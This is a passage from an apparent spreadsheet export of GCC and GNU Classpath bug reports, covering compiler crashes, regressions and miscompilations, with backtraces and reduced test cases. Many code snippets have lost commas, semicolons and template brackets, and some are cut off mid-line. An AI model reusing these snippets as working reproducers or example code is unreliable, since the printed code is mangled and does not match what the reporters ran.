	_ _ _ id8 = [0]int{} &lt;-&lt;-make(chan chan [0]int) ((&lt;-&lt;-make(chan chan int ([]int{})[([]int{})[&lt;-make(chan int)]])) + (&lt;-&lt;-([]chan chan int{})[&lt;-make(chan int (&lt;-&lt;-&lt;-make(chan chan chan []int 1))[&lt;-make(chan int 1)])])) id7(id3([0]string{}))
	_ = id8
	_ = id6
}
$ go build -compiler=gccgo src.go
# command-line-arguments
go1: internal compiler error: in fold_convert_loc at fold-const.c:2072
0x7ce963 fold_convert_loc(unsigned int tree_node* tree_node*)
	../../gcc/fold-const.c:2072
0x5c6bc5 Gcc_backend::temporary_variable(Bfunction* Bblock* Btype* Bexpression* bool Location Bstatement**)
	../../gcc/go/go-gcc.cc:2483
0x6080a4 Temporary_statement::do_get_backend(Translate_context*)
	../../gcc/go/gofrontend/statements.cc:460
0x5db097 Block::get_backend(Translate_context*)
	../../gcc/go/gofrontend/gogo.cc:5454
0x60741c Block_statement::do_get_backend(Translate_context*)
	../../gcc/go/gofrontend/statements.cc:1811
0x5db097 Block::get_backend(Translate_context*)
	../../gcc/go/gofrontend/gogo.cc:5454
0x5dc925 Function::build(Gogo* Named_object*)
	../../gcc/go/gofrontend/gogo.cc:5062
0x5ddc57 Named_object::get_backend(Gogo* std::vector &gt;&amp; std::vector &gt;&amp; std::vector &gt;&amp;)
	../../gcc/go/gofrontend/gogo.cc:6753
0x5e2b5c Gogo::write_globals()
	../../gcc/go/gofrontend/gogo.cc:1136</t>
  </si>
  <si>
    <t>GCC-28531</t>
  </si>
  <si>
    <t>[win32] serialisation is broken on mingw (works on linux)</t>
  </si>
  <si>
    <t>gcj (GCC) 4.2.0 20060726 (experimental)
Deserialize an object fails on Class.forName(). I assumed this would work because class.forName() doesn't use the stack unwinder any longer.
Exception:
Exception in thread main java.lang.ClassNotFoundException: Serialisation
   at java.lang.Class.forName(/home/trudemar/.eclipse_workspace/gcjSource/libjava/java/lang/natClass.cc:91)
   at java.io.ObjectInputStream.resolveClass(/home/trudemar/.eclipse_workspace/gcjSource/libjava/java/io/ObjectInputStream.java:800)
   at java.io.ObjectInputStream.readClassDescriptor(/home/trudemar/.eclipse_workspace/gcjSource/libjava/java/io/ObjectInputStream.java:551)
   at java.io.ObjectInputStream.readObject(/home/trudemar/.eclipse_workspace/gcjSource/libjava/java/io/ObjectInputStream.java:245)
   at java.io.ObjectInputStream.readObject(/home/trudemar/.eclipse_workspace/gcjSource/libjava/java/io/ObjectInputStream.java:292)
   at Serialisation.read(D:/programming/javaCompiler/code/tests/1_console/2_serialisation/Serialisation.java:43)
   at Serialisation.main(D:/programming/javaCompiler/code/tests/1_console/2_serialisation/Serialisation.java:21)</t>
  </si>
  <si>
    <t>GCC-9140</t>
  </si>
  <si>
    <t>[3.4 regression] new C++ parser failures on mips-irix6/sparc-solaris2 with g++.benjamin/15799.C g++.jason/overload28.C g++.law/arg1.C g++.mike/net2.C</t>
  </si>
  <si>
    <t>I get these new failures which look related to each other and began happening with the new c++ parser merge on mips-sgi-irix6.5.  See http://gcc.gnu.org/ml/gcc-testresults/2003-01/msg00031.html
FAIL: g++.benjamin/15799.C caused compiler crash
FAIL: g++.jason/overload28.C caused compiler crash
FAIL: g++.law/arg1.C caused compiler crash
FAIL: g++.mike/net2.C caused compiler crash
Most of these errors (all but arg1.C) also occur on sparc-sun-solaris2.7.  See http://gcc.gnu.org/ml/gcc-testresults/2003-01/msg00058.html
The error message in the logfile in all cases looks like this:
overload28.C: In function `int main()':
overload28.C:10: error: call of overloaded `Internal compiler error: Error reporting routines re-entered.
Release:
gcc version 3.4 20030101 (experimental)
Environment:
mips-sgi-irix6.5
sparc-sun-solaris2.7
How-To-Repeat:
Target mips-sgi-irix6.5 and compile overload28.ii with:
cc1plus -fpreprocessed overload28.ii -quiet -dumpbase overload28.C -ansi -auxbase overload28 -pedantic-errors -Wno-long-long -ansi -version -fmessage-length=0 -o overload28.s
# 1 /caip/u58/ghazi/gcc-testing/egcc-CVS20030102/gcc/testsuite/g++.old-deja/g++.jason/overload28.C
# 1 
# 1 
# 1 /caip/u58/ghazi/gcc-testing/egcc-CVS20030102/gcc/testsuite/g++.old-deja/g++.jason/overload28.C
struct Foo {
  Foo() { }
  Foo(int i = 25) { }
}
int main()
{
  Foo* f1 = new Foo()
}</t>
  </si>
  <si>
    <t>GCC-44486</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5/4.6 regression] missing space in __PRETTY_FUNCTION__ expansion in anonymous namespace</t>
  </si>
  <si>
    <t>The S::f() text reads as though S were a template. I suspect the
text is simply missing a space between the S and  but I wonder if
the  bit could actually be replaced by something less ambiguous
in C++ (such as /* unnamed */ or perhaps better still /* anonymous */).
Btw. since glibc uses __PRETTY_FUNCTION__ in its definition of the assert()
macro this shows up in quite a bit of output.
$ cat t.cpp &amp;&amp; g++ -dumpversion &amp;&amp; g++ t.cpp &amp;&amp; ./a.out
#include 
struct S { }
namespace { S f() { std::puts(__PRETTY_FUNCTION__) return S() } }
int main() { f() }
4.4.3
S::f()</t>
  </si>
  <si>
    <t>GCC-2782</t>
  </si>
  <si>
    <t>HPUX: g77 3.0 (pre) regression caused by C90 bool args</t>
  </si>
  <si>
    <t>HPUX testsuite results after
2001-03-15  Zack Weinberg  
        * proj.h intdoc.c: Delete 'bool' type. Don't include
        stddef.h here.
        * com.c: Rename variables named 'true' and/or 'false'.
have had FAILs for g77.f-torture/compile/alpha1.f
which is a regression since 2.95.2.
It appears that in the one case where f/stc.c:ffestc_decl_item
is called with TRUE as the last argument it appears as false.
--
stb.c:  ffestc_decl_item (ffesta_tokens[1] ffestb_local_.decl.kind
stb.c-          ffestb_local_.decl.kindt ffestb_subrargs_.dim_list.dims
stb.c-          ffestb_local_.decl.len ffestb_local_.decl.lent NULL NULL
stb.c-                  TRUE)
--
...
--
stc.c:ffestc_decl_item (ffelexToken name ffebld kind ffelexToken kindt
stc.c-  ffesttDimList dims ffebld len ffelexToken lent ffebld init
stc.c-          ffelexToken initt bool clist)
stc.c-{
--
Reported previously as 
Release:
3.0 20010507 (prerelease)
Environment:
hppa2.0-hp-hpux10.20 hppa1.1-hp-hpux11.00
How-To-Repeat:
# Smaller testcase
$ cat - &gt; tmp.f
      INTEGER J(1)/0/
C
      END
$ g77 -v -c -o tmp.o tmp.f
g77 version 2.95.2 19991024 (release) (from FSF-g77 version 0.5.25 19991024 (rel
ease))
Reading specs from /usr/local/lib/gcc-lib/hppa2.0-hp-hpux10.20/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /usr/local/lib/gcc-lib/hppa2.0-hp-hpux10.20/2.95.2/f771 tmp.f -quiet -dumpbase 
tmp.f -version -fversion -o /var/tmp/cchIrIXb.s
GNU F77 version 2.95.2 19991024 (release) (hppa2.0-hp-hpux10.20) compiled by GNU
 C version 2.95.2 19991024 (release).
GNU Fortran Front End version 0.5.25 19991024 (release)
 /usr/local/lib/gcc-lib/hppa2.0-hp-hpux10.20/2.95.2/as -o tmp.o /var/tmp/cchIrIX
b.s
$ ../g77 -B../ -v -o tmp.o tmp.f
g77 version 3.0 20010507 (prerelease) (Fortran Frontend version 0.5.26 20010507 
(experimental))
Driving: ../g77 -B../ -v -o tmp.o tmp.f -lg2c -lm
Reading specs from ../specs
Configured with: ../gcc-20010507/configure --with-gnu-as
Thread model: single
gcc version 3.0 20010507 (prerelease)
 ../f771 tmp.f -quiet -dumpbase tmp.f -version -o /var/tmp/ccA29Qsm.s
GNU F77 version 3.0 20010507 (prerelease) (hppa2.0-hp-hpux10.20)
        compiled by GNU C version 3.0 20010507 (prerelease).
tmp.f: In program `MAIN__':
tmp.f:1:
         INTEGER J(1)/0/
                      ^
Too many initial values in list of initializers starting at (^)
# C90 bool testcase
$ ../xgcc -B../ -v -g -o tmpch2 ~/tmpch2.c
Reading specs from ../specs
Configured with: ../gcc-20010507/configure --with-gnu-as
...
GNU C version 3.0 20010507 (prerelease) (hppa2.0-hp-hpux10.20)
$ /devel/span/rdb/src/gdb-4.95.1.obj/gdb/gdb tmpch2
GNU gdb 4.95.1
Copyright 2000 Free Software Foundation Inc.
...
This GDB was configured as hppa2.0-hp-hpux10.20...
...
(gdb) l 1
1       #define DECL_T(type type_name) \
2       void test_##type_name( \
3          type a type b type c type d type e type f type g type h \
4          type i type j type k type l type m type n type o type p)
5
6       DECL_T(_Bool _Bool)
7       {
8         if (0
9         || a != 1 || b != 0 || c != 1 || d != 0
10       || e != 1 || f != 0 || g != 1 || h != 0
11       || i != 1 || j != 0 || k != 1 || l != 0
12       || m != 1 || n != 0 || o != 1 || p != 0)
13              abort()
14      }
15
16      DECL_T(unsigned char uchar)
17      {
18       if (0
19       || a != 'a' || b != 'b' || c != 'c' || d != 'd'
20       || e != 'e' || f != 'f' || g != 'g' || h != 'h'
(gdb) b 13
Breakpoint 1 at 0x32a4: file /user/rand/pms71504/tmpch2.c line 13.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /devel/span/rdb/src/gcc-20010507.obj/gcc/testsuite/tmpch2
...
Breakpoint 1 test__Bool (a=true b=false c=true d=false e=false f=false
    g=false h=false i=false j=false k=false l=false m=false n=false
    o=false p=false) at /user/rand/pms71504/tmpch2.c:13
13              abort()
(gdb) up 1
#1  0x3b74 in main () at /user/rand/pms71504/tmpch2.c:70
70       test__Bool(1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0)
Looking at the assembler it appears that bool values are
being loaded and stored from the most-significant byte
of a 32-bit stack slot or local not the least-significant.
Comparing against unsigned char bool values seem to be
using 32-bit temporaries instead of 8-bit ones.</t>
  </si>
  <si>
    <t>rbrown64</t>
  </si>
  <si>
    <t>GCC-10244</t>
  </si>
  <si>
    <t>[3.4 regression] In error messages for templates template type is no longer displayed</t>
  </si>
  <si>
    <t>For a code like this:
--------------------------
template  void f(T) { BOGUS }
int main() { f (1) }
--------------------------
we would previously get an error message that states
the type of T:
g/x&gt; /home/bangerth/bin/gcc-3.3-pre/bin/c++ -c compiler_bug.cc
compiler_bug.cc: In function `void f(T) [with T = int]':
compiler_bug.cc:9:   instantiated from here
compiler_bug.cc:4: error: `BOGUS' undeclared (first use this function)
compiler_bug.cc:4: error: (Each undeclared identifier is reported only once for
   each function it appears in.)
With present mainline this [with T=int] is missing:
g/x&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c compiler_bug.cc
compiler_bug.cc: In function `void f(T)':
compiler_bug.cc:4: error: `BOGUS' has not been declared
I think this makes finding errors harder to find and
consider this a regression.
W.
Release:
present mainline
Environment:
probably all</t>
  </si>
  <si>
    <t>GCC-4925</t>
  </si>
  <si>
    <t>__builtin_memcpy overcopies on ix86 in gcc 3.0.2</t>
  </si>
  <si>
    <t>On the ix86 with gcc 3.0.2 when compiling with optimization
__builtin_memcpy can copy bytes which it should not copy.  The
following program demonstrates the problem.  This is an example of the
common C idiom in which a trailing field in a struct is only partially
allocated and used.  The test program does not show the partial
allocation but it does show that __builtin_memcpy overwrites a byte
which it should not overwrite.
This program exits 0 when compiled without optimization and run.  It
exits 1 when compiled with optimization (-O) and run.
This bug causes a miscompilation of Postgres 7.1.3 when configured
with --enable-cassert.  In actual practice the code calls memcpy
which gcc automatically translates into __builtin_memcpy when
optimizing.
This bug does not appear to occur in the current development sources
in which the i386 movstrsi handling has been at least somewhat
rewritten.  If there is a gcc 3.0.3 release the fix should be
incorporated.
Release:
3.0.2
Environment:
System: Linux daffy.airs.com 2.2.18 #5 Tue Feb 6 13:57:37 PST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../../tools/egcs/configure  : (reconfigured) ../../tools/egcs/configure --with-gcc-version-trigger=/home/ian/tools/tools/egcs/gcc/version.c --host=i686-pc-linux-gnu --enable-shared=libstdc++
How-To-Repeat:
struct s
{
  int i[20]
  short s
  char f
  char b[100]
}
struct s s1
int
main()
{
  struct s s2
  s2.b[0] = 100
  __builtin_memcpy(
  exit(s2.b[0] != 100)
}</t>
  </si>
  <si>
    <t>GCC-59632</t>
  </si>
  <si>
    <t>ICE with erroneous loop condition after #pragma GCC ivdep</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on trunk:
==============================================================
void foo()
{
#pragma GCC ivdep
  while(foo()) {}
}
==============================================================
bug.cc: In function 'void foo()':
bug.cc:4:13: error: could not convert 'foo()' from 'void' to 'bool'
   while(foo()) {}
             ^
bug.cc:1:6: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in fold_comparison at fold-const.c:9316
 void foo()
      ^
0xd8f855 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
        ../../gcc/gcc/tree.c:9243
0x93ef66 tree_class_check
        ../../gcc/gcc/tree.h:2830
0x93ef66 fold_comparison
        ../../gcc/gcc/fold-const.c:9316
0x941e1b fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
        ../../gcc/gcc/fold-const.c:12953
0x96309a fold_build2_stat_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
        ../../gcc/gcc/fold-const.c:15194
0x93f64d fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
        ../../gcc/gcc/fold-const.c:10181
0xba0e8c fold_cond_expr_cond()
        ../../gcc/gcc/tree-cfg.c:650
0xba996e make_edges
        ../../gcc/gcc/tree-cfg.c:780
0xba996e build_gimple_cfg
        ../../gcc/gcc/tree-cfg.c:260
0xba996e execute_build_cfg
        ../../gcc/gcc/tree-cfg.c:336
0xba996e execute
        ../../gcc/gcc/tree-cfg.c:374
Please submit a full bug report [etc.]
Tobias this appeared right after your patch
2013-10-30  Tobias Burnus  
	PR other/33426
	* cp-tree.h (RANGE_FOR_IVDEP): Define.
	(cp_convert_range_for finish_while_stmt_cond finish_do_stmt
	finish_for_cond): Take 'bool ivdep' parameter.
	* cp-array-notation.c (create_an_loop): Update call.
	* init.c (build_vec_init): Ditto.
	* pt.c (tsubst_expr): Ditto.
	* parser.c (cp_parser_iteration_statement cp_parser_for
	cp_parser_range_for cp_convert_range_for): Update calls.
	(cp_parser_pragma): Accept GCC ivdep for 'while' and 'do'.
	* semantics.c (finish_while_stmt_cond finish_do_stmt
	finish_for_cond): Optionally build ivdep annotation.
Would you mind having a look?</t>
  </si>
  <si>
    <t>GCC-4356</t>
  </si>
  <si>
    <t>Exception handling does not work at all for NetBSD/i386 ELF target</t>
  </si>
  <si>
    <t>Any C++ programm using exception handling will cause core dump. Running the test programm (that is provided with this PR) under debugger has shown that `abort ()' is called after falling through the 'switch (fs-&gt;cfa_how)' statement in 'uw_update_context_1' to default label. 
Full traceback is provided as well:
#0  0x8049395 in uw_update_context (context=0xbfbfd050 fs=0xbfbfcf90)
    at ../../gcc/unwind-dw2.c:1042
#1  0x8049649 in _Unwind_RaiseException (exc=0x805402c)
    at ../../gcc/unwind.inc:1042
#2  0x804da78 in __cxa_throw (obj=0x805404c tinfo=0x8050f4c dest=0)
    at ../../../../libstdc++-v3/libsupc++/eh_throw.cc:72
#3  0x80483f0 in main () at exc.C:7
Release:
NetBSD 1.5 (-current as well)
Environment:
Operating system: NetBSD/i386 1.5 -current
Compiler version: gcc version 3.1 20010918 (actually all post 3.0 versions are affected) configured with options:
../configure --with-gcc-version-trigger=/usr/src/CVS-mirrors/gcc/gcc/version.c --host=i386-unknown-netbsdelf1.5Y --prefix=/usr/local/gcc-3.1-debug --enable-shared=libgcczliblibstdc++boehm-gclibjava --disable-checking --norecursion
Compiler options: no special options are required to reproduce the bug.
How-To-Repeat:
Try to compile and run any C++ program with recent version of g++ that throws exceptions (the trivial example is provided in attachment) on NetBSD/i386 ELF.</t>
  </si>
  <si>
    <t>olgerd</t>
  </si>
  <si>
    <t>GCC-66043</t>
  </si>
  <si>
    <t>ICE on storage_size of null or output of null array</t>
  </si>
  <si>
    <t>---
code snippet 1 :
   program p
      print * storage_size([null()])
   end
f951: internal compiler error: Invalid expression in gfc_element_size.
---
code snippet 2 :
   program p
      print * storage_size(null())
   end
f951: internal compiler error: Invalid expression in gfc_element_size.
---
code snippet 3 :
   program p
      print * [null()]
   end
internal compiler error: in gfc_typenode_for_spec at fortran/trans-types.c:1084
---
Tested with gfortran 5.1.1 on SUSE Linux 13.2 (64 bit).
Kind regards.</t>
  </si>
  <si>
    <t>GCC-15190</t>
  </si>
  <si>
    <t>incorrect matching after keywords</t>
  </si>
  <si>
    <t>The following free-form code compiles without error:
INTEGER f
PRINTf 2
END 
The parser should enforce a space between print and f.</t>
  </si>
  <si>
    <t>GCC-33926</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/dfp/convert-dfp-round-thread.c execution test</t>
  </si>
  <si>
    <t>I got
FAIL: gcc.dg/dfp/convert-dfp-round-thread.c execution test
on Linux/ia32 and Linux/x86-64 with revision 129372 and revision 129351
is OK.</t>
  </si>
  <si>
    <t>GCC-69666</t>
  </si>
  <si>
    <t>[5 Regression] gcc ICE at -O2 and -O3 on valid code on x86_64-linux-gnu in verify_gimple failed</t>
  </si>
  <si>
    <t>The following valid code causes an ICE when compiled with the current gcc trunk at only -O2 and -O3 on x86_64-linux-gnu in both 32-bit and 64-bit modes.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/home/absozero/trunk/root-gcc/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/home/absozero/trunk/root-gcc --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20160203 (experimental) [trunk revision 233104] (GCC)
$ gcc-trunk abc.c -O2
abc.c: In function 'fun2':
abc.c:13:1: error: conversion of register to a different size
 }
 ^
VIEW_CONVERT_EXPR(e_10(D))
_4 = VIEW_CONVERT_EXPR(e_10(D))
abc.c:13:1: internal compiler error: verify_gimple failed
0xba0056 verify_gimple_in_cfg(function* bool)
	../../gcc/gcc/tree-cfg.c:5125
0xa935d7 execute_function_todo
	../../gcc/gcc/passes.c:1958
0xa93ecb execute_todo
	../../gcc/gcc/passes.c:2010
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ cat abc.c
int a c d
float b
void *memcpy()
int fun1(int p1 unsigned char *p2) {
  p2[p1] = b
  return a
}
void fun2() {
  unsigned char e[16]
  fun1(16 e)
  d = e[d]
  memcpy(
}</t>
  </si>
  <si>
    <t>GCC-16959</t>
  </si>
  <si>
    <t>[3.4 Regression] Segmentation fault in ios_base::sync_with_stdio</t>
  </si>
  <si>
    <t>In src/ios_init.cc:
  bool 
  ios_base::sync_with_stdio(bool __sync)
  { 
    // _GLIBCXX_RESOLVE_LIB_DEFECTS
    // 49.  Underspecification of ios_base::sync_with_stdio
    bool __ret = ios_base::Init::_S_synced_with_stdio
    // Turn off sync with C FILE* for cin cout cerr clog iff
    // currently synchronized.
    if (!__sync &amp;&amp; __ret)
      {
        ios_base::Init::_S_synced_with_stdio = __sync
        // Explicitly call dtors to free any memory that is
        // dynamically allocated by filebuf ctor or member functions
        // but don't deallocate all memory by calling operator delete.
        buf_cout_sync.~stdio_sync_filebuf()
        buf_cin_sync.~stdio_sync_filebuf()
        buf_cerr_sync.~stdio_sync_filebuf()
This is fine except that there is no guarantee that buf_cout_sync and friends
have been constructed before this gets run. If the objects haven't been
constructed the program segfaults.
A simple fix would be to construct an ios_base::Init object at the beginning
of the block.</t>
  </si>
  <si>
    <t>GCC-79090</t>
  </si>
  <si>
    <t>[7 regression] DSE wrongly removes store at variable offset</t>
  </si>
  <si>
    <t>Created attachment 40520
Reduced testcase
The latest DSE changes introduced a regression in the ACATS testsuite:
                === acats tests ===
FAIL:   c432003
                === acats Summary ===
# of expected passes            2319
# of unexpected failures        1
Native configuration is x86_64-suse-linux-gnu
Reduced testcase attached to be compiled like this:
eric@polaris:~/build/gcc/native&gt; gnatchop testcase.txt 
splitting testcase.txt into:
   opt62.adb
   opt62_pkg.ads
eric@polaris:~/build/gcc/native&gt; gnatmake opt62 -O
gcc -c -O opt62.adb
gcc -c -O opt62_pkg.ads
gnatbind -x opt62.ali
gnatlink opt62.ali -O
eric@polaris:~/build/gcc/native&gt; ./opt62 
raised PROGRAM_ERROR : opt62.adb:13 explicit raise
eric@polaris:~/build/gcc/native&gt; gcc/xgcc -Bgcc -S opt62.adb -O -fdump-tree-dse1-details
This is the wrong store removal:
 Function Opt62 (_ada_opt62 funcdef_no=1 decl_uid=4169 cgraph_uid=0 symbol_order=0)
  Deleted dead store: MEM[(struct opt62_pkg__unconstrained_der 
The testcase can be added directly to the gnat.dg testsuite.</t>
  </si>
  <si>
    <t>GCC-3442</t>
  </si>
  <si>
    <t>followup to PR3440</t>
  </si>
  <si>
    <t>The error occured at 0x8055805:
0x80557fe : mov 0x18(%edx)%eax
Thanks. I'll work around it for now.
Release:
gcc version 2.95.4 20010604 (Debian prerelease)
Environment:
Debian GNU/Linux unstable</t>
  </si>
  <si>
    <t>apwingo</t>
  </si>
  <si>
    <t>GCC-46958</t>
  </si>
  <si>
    <t>ARM Go Does Not Compile (__builtin_return_address)</t>
  </si>
  <si>
    <t>arm-rtems4.11-gcc (GCC) 4.6.0 20101214 (experimental) [trunk revision 167806]
/users/joel/test-gcc/gcc-svn/libgo/runtime/go-caller.c: In function 'Caller':
/users/joel/test-gcc/gcc-svn/libgo/runtime/go-caller.c:34:60: error: unsupported argument to '__builtin_return_address' [-Werror]
cc1: all warnings being treated as errors</t>
  </si>
  <si>
    <t>GCC-46170</t>
  </si>
  <si>
    <t>[4.5 Regression] g++ wrongly rejects pointer-to-member in template arguments</t>
  </si>
  <si>
    <t>The following reduced test case is wrongly rejected by g++-4.4 and g++-4.5:
============ test case: reduce.ii =================
namespace util {
struct option_value {
}
template  struct options_map_impl {
typedef T options_struct_type
typedef bool (*opt_func)(const option_value
template   static  bool  set_member_constant(const option_value
template   static  bool  set_member_constant(const option_value&amp; opt options_struct_type&amp; t) {
return set_member_constant(opt t mem)
}
}
}
struct cflat_options {
bool show_precharges
}
typedef util::options_map_impl options_map_impl_type
class register_options_modifier {
typedef options_map_impl_type::opt_func modifier_type
public:  register_options_modifier()
register_options_modifier(const char* Mode    const modifier_type COM    const char* h)
}
static const register_options_modifier cflat_opt_mod_show_precharges(precharges 
=========== end test case ===============
delta-reduced using:
#!/bin/sh -e
# reduce.sh
CXXFLAGS=-ansi -Woverloaded-virtual -W -Wextra -Wall -Wundef -Wshadow -Wno-unused-parameter -Wpointer-arith -Wcast-qual -Wcast-align -Wconversion -Werror -Wno-conversion -Wno-long-long
# must pass g++-4.2 first
g++ $CXXFLAGS -c -o reduce.o reduce.ii
g++-4 -pipe -g -O2 $CXXFLAGS -x c++ reduce.ii -o reduce.o 2&gt; reduce.err || :
grep -q not a valid template argument reduce.err
# exactly 4 lines of errors
el=`wc -l reduce.err | awk '{print $1}'`
test $el -eq 4
============================================
diagnostic:
reduce.ii: In static member function 'static bool util::options_map_impl::set_member_constant(const util::option_value&amp; T&amp;) [with V = bool V T::* mem = &amp;cflat_options::show_precharges V K = true T = cflat_options]':
reduce.ii:22:   instantiated from here
reduce.ii:9: error: 'true' is not a valid template argument for type 'bool cflat_options::*'
reduce.ii:9: error: it must be a pointer-to-member of the form `&amp;X::Y'
============================================
it pass g++-4.2 and fails g++-4.4 g++-4.5:
fang@fangbook 163&gt; g++ -v
Using built-in specs.
Target: i686-apple-darwin10
Configured with: /var/tmp/gcc/gcc-5664~105/src/configure --disable-checking --enable-werror --prefix=/usr --mandir=/share/man --enable-languages=cobjcc++obj-c++ --program-transform-name=/^[cg][^.-]*$/s/$/-4.2/ --with-slibdir=/usr/lib --build=i686-apple-darwin10 --program-prefix=i686-apple-darwin10- --host=x86_64-apple-darwin10 --target=i686-apple-darwin10 --with-gxx-include-dir=/include/c++/4.2.1
Thread model: posix
gcc version 4.2.1 (Apple Inc. build 5664)
fang@fangbook 164&gt; g++-4 -v
Using built-in specs.
Target: i386-apple-darwin10.4.0
Configured with: ../gcc-4.4.4/configure --prefix=/sw --prefix=/sw/lib/gcc4.4 --mandir=/sw/share/man --infodir=/sw/lib/gcc4.4/info --enable-languages=cc++fortranobjcobj-c++java --with-gmp=/sw --with-libiconv-prefix=/sw --with-ppl=/sw --with-cloog=/sw --with-mpc=/sw --with-system-zlib --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --program-suffix=-fsf-4.4
Thread model: posix
gcc version 4.4.4 (GCC) 
(for 4.5)
g++-4 -v
Using built-in specs.
COLLECT_GCC=g++-4
COLLECT_LTO_WRAPPER=/Volumes/MacSpare/sw/lib/gcc4.5/bin/../libexec/gcc/i386-apple-darwin10.4.0/4.5.0/lto-wrapper
Target: i386-apple-darwin10.4.0
Configured with: ../gcc-4.5.0/configure --prefix=/sw --prefix=/sw/lib/gcc4.5 --mandir=/sw/share/man --infodir=/sw/lib/gcc4.5/info --enable-languages=cc++fortranobjcobj-c++java --with-gmp=/sw --with-libiconv-prefix=/sw --with-ppl=/sw --with-cloog=/sw --with-mpc=/sw --with-system-zlib --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --program-suffix=-fsf-4.5
Thread model: posix
gcc version 4.5.0 (GCC) 
===================================
keywords: rejects-valid diagnostic
known-to-work: 4.2.1
known-to-fail: 4.4.4 4.5.0
This also used to work on 4.4.2 so it might be a branch regression.</t>
  </si>
  <si>
    <t>fang</t>
  </si>
  <si>
    <t>CLASSPATH-16659</t>
  </si>
  <si>
    <t>Displaying AWT Button with no text seg-faults in peer</t>
  </si>
  <si>
    <t>The following test case causes a crash in the GTK peers:
import java.awt.*
public class ButtonTest
{
  public static void main(String[] args)
  {
    Frame f = new Frame(Test)
    f.setSize(200 200)
    f.add(new Button())
    f.setVisible(true)
  }
}
$ gij Text
Aborted
0x010275b1 in _Jv_JNI_GetField (env=0xa12f3c0 obj=0x0 field=0xa12f3c0)
    at ../../../libjava/jni.cc:1150
1150      return wrap_value (env *ptr)
(gdb) bt
#0  0x010275b1 in _Jv_JNI_GetField (env=0xa12f3c0 obj=0x0 
    field=0xa12f3c0) at ../../../libjava/jni.cc:1150
#1  0x00547bf9 in get_state (env=0xa12f3c0 obj=0x0 table=0xa027348)
    at ../../../libjava/jni/classpath/native_state.c:229
#2  0x0053aea5 in Java_gnu_java_awt_peer_gtk_GtkComponentPeer_set__Ljava_lang_St
ring_2Ljava_lang_Object_2 (env=0xa12f3c0 obj1=0x0 jname=0xa0f7540 obj2=0x0)
    at ../../../libjava/jni/gtk-peer/gnu_java_awt_peer_gtk_GtkComponentPeer.c:10
43
#3  0x0052a95e in gnu.java.awt.peer.gtk.GtkComponentPeer.set(java.lang.String j
ava.lang.Object) (this=0x0 name=0x0 value=0x0)
    at ../../../libjava/gnu/java/awt/peer/gtk/GtkComponentPeer.java:516
#4  0x0052aa27 in gnu.java.awt.peer.gtk.GtkComponentPeer.set(gnu.java.awt.peer.g
tk.GtkArg) (this=0xa0f4420 arg=0xa10a7a0)
    at ../../../libjava/gnu/java/awt/peer/gtk/GtkComponentPeer.java:552
#5  0x005260c2 in gnu.java.awt.peer.gtk.GtkArgList.setArgs(gnu.java.awt.peer.gtk
.GtkComponentPeer) (this=0xa0f43f0 cp=0xa0f4420)
    at ../../../libjava/gnu/java/awt/peer/gtk/GtkArgList.java:72
#6  0x00529080 in gnu.java.awt.peer.gtk.GtkComponentPeer.GtkComponentPeer(java.a
wt.Component) (this=0xa0f4420 awtComponent=0xa153ed8)
....</t>
  </si>
  <si>
    <t>GCC-71066</t>
  </si>
  <si>
    <t>[7 Regression] ICE in set_loop_bounds at fortran/trans-array.c:4680</t>
  </si>
  <si>
    <t>This first example is partially related to pr50410 :
$ cat z1.f90
program p
   type t
      real allocatable :: a(::)
   end type
   type(t) pointer :: x
   data x%a / 1.0 /
end
$ gfortran-6 z1.f90
internal compiler error: in set_loop_bounds at fortran/trans-array.c:4680
---
Another situation :
$ cat z3.f90
program p
   real :: a(22)[*]
   data a /4*0.0/
end
$ gfortran-6 -fcoarray=single z3.f90
$ gfortran-6 -fcoarray=lib z3.f90
internal compiler error: in set_loop_bounds at fortran/trans-array.c:4680</t>
  </si>
  <si>
    <t>GCC-61313</t>
  </si>
  <si>
    <t>configure incorrectly strips $target_alias from PLUGIN_LD_SUFFIX</t>
  </si>
  <si>
    <t>When gcc is configured using --with-plugin-ld=/some/path/x86_64-pc-linux-gnu-hjl-master/bin/ld the resulting ld path will be reduced to the incorrect /some/path/hjl-master/bin/ld (for a x86_64-pc-linux-gnu target). This change was introduced by git commit 61f41b94c58c64e7334d97df57d6467cb1c7b70e and is part of gcc 4.8+.</t>
  </si>
  <si>
    <t>GCC-69742</t>
  </si>
  <si>
    <t>[5 Regression] ICE with -O3 and ASSOCIATE containing repeated expression</t>
  </si>
  <si>
    <t>This code produces and internal compiler error when compiled with -O3.
It seems that the problem is the appearance of the same expression
twice inside the associate construct. The code compiles and runs
without optimization.
program p
 implicit none
 integer allocatable :: i(:) j
  allocate( i(5) )
  i = (/( j  j=15 )/)
  ! The ICE appears when size(i) is used twice in associate
  associate( i5 =&gt; i(size(i):size(i)) ) ! this gives ICE
  !associate( i5 =&gt; i(size(2*i):size(i)) ) ! this works
  i5 = 2
  end associate
  write(**) i
end program p
$ gfortran -O3 test.f90 -o test
test.f90:11:0:
   i5 = 2
internal compiler error: in gimplify_var_or_parm_decl bei gimplify.c:1840
0x86e434 gimplify_var_or_parm_decl
	gcc/gimplify.c:1840
0x872051 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	gcc/gimplify.c:10595
